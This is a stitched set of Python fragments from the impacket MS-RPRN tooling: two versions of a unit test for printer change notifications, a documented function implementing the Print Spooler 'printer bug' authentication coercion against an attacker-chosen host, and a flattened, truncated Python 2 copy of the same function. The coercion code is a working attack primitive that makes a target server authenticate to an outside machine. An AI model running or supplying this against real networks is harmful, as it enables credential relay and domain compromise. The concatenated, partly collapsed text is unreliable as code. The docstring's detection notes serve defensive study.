def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
    """Open a server handle on the target spooler, then ask for change notifications on it.

    The notification request is pointed back at the test machine itself
    (pszLocalMachine == the target), so this exercises the wire format only.
    The call is expected to fault with ERROR_INVALID_HANDLE (presumably
    because a server handle rather than a printer handle is supplied); that
    fault is tolerated, any other exception propagates and fails the test.
    """
    dce, _transport = self.connect()

    # Same UNC-style name is used for the printer handle and the callback host.
    target_name = '\\\\%s\x00' % self.machine

    open_req = rprn.RpcOpenPrinter()
    open_req['pPrinterName'] = target_name
    open_req['pDatatype'] = NULL
    open_req['pDevModeContainer']['pDevMode'] = NULL
    open_req['AccessRequired'] = (
        rprn.SERVER_READ
        | rprn.SERVER_ALL_ACCESS
        | rprn.SERVER_ACCESS_ADMINISTER
    )
    open_req.dump()
    open_resp = dce.request(open_req)
    open_resp.dump()

    notify_req = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
    notify_req['hPrinter'] = open_resp['pHandle']
    notify_req['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
    notify_req['pszLocalMachine'] = target_name
    notify_req['pOptions'] = NULL
    notify_req.dump()

    try:
        notify_resp = dce.request(notify_req)
        notify_resp.dump()
    except Exception as err:
        # Only the expected fault is swallowed; everything else is a real failure.
        if 'ERROR_INVALID_HANDLE' not in str(err):
            raise
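def lookup(self, rpctransport, host):
    """Bind to MS-RPRN on ``host`` and request a printer change notification
    whose ``pszLocalMachine`` is ``self.__attackerhost``.

    This is the spooler "printer bug" authentication-coercion primitive: the
    target spooler is asked to deliver notifications to the named host and
    authenticates to it in the process.  On the defensive side this shows up
    as an MS-RPRN bind followed by RpcRemoteFindFirstPrinterChangeNotificationEx
    naming a machine that is not a print server; stopping the Print Spooler
    on the target removes the interface (the unguarded ``dce.bind`` below then
    raises to the caller).

    Args:
        rpctransport: impacket transport already targeting ``host``; only
            ``get_dce_rpc()`` is used here.
        host: hostname/IP used for the optional TCP ping and the
            ``hRpcOpenPrinter`` UNC name.

    Returns:
        None in every path.  Connection, access-denied and offline conditions
        are logged and swallowed; any other RPC fault from ``hRpcOpenPrinter``
        propagates.
    """
    if self.__tcp_ping and self.ping(host) is False:
        logging.info("Host is offline. Skipping!")
        return

    dce = rpctransport.get_dce_rpc()
    try:
        dce.connect()
    except Exception:
        # Any connect failure is reported as a timeout; most commonly the
        # host is not Windows or SMB is closed.
        logging.error("Timeout - Skipping host!")
        return

    # NOTE: not guarded - a missing RPRN interface (spooler stopped) raises here.
    dce.bind(rprn.MSRPC_UUID_RPRN)
    logging.info('Bind OK')

    try:
        resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
    except Exception as err:
        message = str(err)
        if 'Broken pipe' in message:
            # The connection timed out; leave it for the next round.
            logging.error('Connection failed - skipping host!')
            return
        # BUGFIX: the original tested ``str(e).upper().find('ACCESS_DENIED')``
        # directly.  ``find`` returns -1 when absent, which is truthy, so every
        # non-"Broken pipe" error was classified as access denied and the
        # ``raise`` branch was unreachable.  A membership test restores the
        # intended classification.
        if 'ACCESS_DENIED' in message.upper():
            # Not admin on the target.
            logging.error('Access denied - RPC call was denied')
            dce.disconnect()
            return
        raise

    logging.info('Got handle')

    request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
    request['hPrinter'] = resp['pHandle']
    request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
    request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
    request['pOptions'] = NULL
    try:
        dce.request(request)
    except Exception as err:
        # The call commonly faults even when the coercion fired; log instead
        # of print() so the outcome lands in the same sink as the rest.
        logging.info('Notification call raised: %s', err)

    logging.info('Triggered RPC backconnect, this may or may not have worked')
    # The printer handle is not explicitly closed; the disconnect below tears
    # down the binding (presumably sufficient - confirm against rprn helpers).
    dce.disconnect()
    return None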
def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
    """Request change notifications on a freshly opened server handle.

    The callback host is the target itself, so nothing is coerced; the test
    asserts that the spooler rejects the request with a DCERPCSessionError
    carrying ERROR_INVALID_HANDLE.
    """
    dce, _transport = self.connect()

    # One UNC-style name serves as both the opened printer and the callback host.
    machine_name = "\\\\%s\x00" % self.machine

    open_req = rprn.RpcOpenPrinter()
    open_req['pPrinterName'] = machine_name
    open_req['pDatatype'] = NULL
    open_req['pDevModeContainer']['pDevMode'] = NULL
    open_req['AccessRequired'] = (
        rprn.SERVER_READ
        | rprn.SERVER_ALL_ACCESS
        | rprn.SERVER_ACCESS_ADMINISTER
    )
    open_req.dump()
    open_resp = dce.request(open_req)
    open_resp.dump()

    notify_req = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
    notify_req['hPrinter'] = open_resp['pHandle']
    notify_req['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
    notify_req['pszLocalMachine'] = machine_name
    notify_req['pOptions'] = NULL
    notify_req.dump()

    expected = "ERROR_INVALID_HANDLE"
    with assertRaisesRegex(self, rprn.DCERPCSessionError, expected):
        dce.request(notify_req)
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) except Exception, e: if str(e).find('Broken pipe') >= 0: # The connection timed-out. Let's try to bring it back next round logging.error('Connection failed - skipping host!') return False elif str(e).upper().find('ACCESS_DENIED'): # We're not admin, bye logging.error('Access denied - RPC call was denied') dce.disconnect() return False else: return False logging.info('Got handle') request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost request['pOptions'] = NULL try: resp = dce.request(request) except Exception as e: pass logging.info( 'Triggered RPC backconnect, this may or may not have worked') dce.disconnect() return True